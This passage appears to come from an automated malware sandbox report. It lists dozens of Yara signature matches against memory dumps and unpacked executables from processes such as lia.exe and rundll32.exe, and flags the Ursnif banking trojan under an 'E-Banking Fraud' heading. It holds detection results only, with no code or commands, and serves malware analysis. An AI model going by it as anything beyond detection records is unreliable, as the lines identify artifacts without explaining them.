                    Source: Yara match | File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
                    Source: Yara match | File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

                    E-Banking Fraud:

                    Yara detected Ursnif
                    Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY